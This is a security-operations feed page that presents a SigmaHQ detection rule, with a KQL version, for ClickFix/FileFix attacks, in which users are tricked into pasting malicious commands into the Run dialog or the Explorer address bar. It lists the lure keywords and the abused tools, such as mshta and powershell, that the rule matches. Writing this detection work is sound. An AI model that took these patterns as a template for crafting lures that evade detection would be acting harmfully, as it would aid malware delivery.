← Back to SOC feed Coverage →

Suspicious ClickFix/FileFix Execution Pattern

sigma HIGH SigmaHQ
T1204.001T1204.004
imProcessCreate
aptpowershell
This rule was pulled from an open-source repository and enriched with AI. Validate in a test environment before deploying to production.
View original rule at SigmaHQ →
Retrieved: 2026-05-20T23:00:01Z · Confidence: low

Hunt Hypothesis

Detects suspicious execution patterns where users are tricked into running malicious commands via clipboard manipulation, either through the Windows Run dialog (ClickFix) or File Explorer address bar

Detection Rule

Sigma (Original)

title: Suspicious ClickFix/FileFix Execution Pattern
id: d487ed4a-fd24-436d-a0b2-f4e95f7b2635
related:
    - id: f5fe36cf-f1ec-4c23-903d-09a3110f6bbb
      type: similar
status: experimental
description: |
    Detects suspicious execution patterns where users are tricked into running malicious commands via clipboard manipulation, either through the Windows Run dialog (ClickFix) or File Explorer address bar (FileFix).
    Attackers leverage social engineering campaigns—such as fake CAPTCHA challenges or urgent alerts—encouraging victims to paste clipboard contents, often executing mshta.exe, powershell.exe, or similar commands to infect systems.
references:
    - https://github.com/JohnHammond/recaptcha-phish
    - https://www.zscaler.com/blogs/security-research/deepseek-lure-using-captchas-spread-malware
    - https://www.threatdown.com/blog/clipboard-hijacker-tries-to-install-a-trojan/
    - https://app.any.run/tasks/5c16b4db-4b36-4039-a0ed-9b09abff8be2
    - https://www.esentire.com/security-advisories/netsupport-rat-clickfix-distribution
    - https://www.scpx.com.au/2025/11/16/decades-old-finger-protocol-abused-in-clickfix-malware-attacks/ # filefix variant
author: montysecurity, Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2025-11-19
tags:
    - attack.execution
    - attack.t1204.001
    - attack.t1204.004
logsource:
    category: process_creation
    product: windows
detection:
    selection_parent:
        ParentImage|endswith: '\explorer.exe'
        CommandLine|contains: '#'
    selection_cli_captcha:
        CommandLine|contains:
            - 'account'
            - 'anti-bot'
            - 'botcheck'
            - 'captcha'
            - 'challenge'
            - 'confirmation'
            - 'fraud'
            - 'human'
            - 'identification'
            - 'identificator'
            - 'identity'
            - 'robot'
            - 'validation'
            - 'verification'
            - 'verify'
    condition: all of selection_*
falsepositives:
    - Unlikely
level: high

KQL (Azure Sentinel)

imProcessCreate
| where ((ParentProcessName endswith "\\explorer.exe" or ActingProcessName endswith "\\explorer.exe") and TargetProcessCommandLine contains "#") and (TargetProcessCommandLine contains "account" or TargetProcessCommandLine contains "anti-bot" or TargetProcessCommandLine contains "botcheck" or TargetProcessCommandLine contains "captcha" or TargetProcessCommandLine contains "challenge" or TargetProcessCommandLine contains "confirmation" or TargetProcessCommandLine contains "fraud" or TargetProcessCommandLine contains "human" or TargetProcessCommandLine contains "identification" or TargetProcessCommandLine contains "identificator" or TargetProcessCommandLine contains "identity" or TargetProcessCommandLine contains "robot" or TargetProcessCommandLine contains "validation" or TargetProcessCommandLine contains "verification" or TargetProcessCommandLine contains "verify")

Required Data Sources

Sentinel TableNotes
imProcessCreateEnsure this data connector is enabled

False Positive Guidance

MITRE ATT&CK Context

References

Original source: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_susp_clickfix_filefix_execution.yml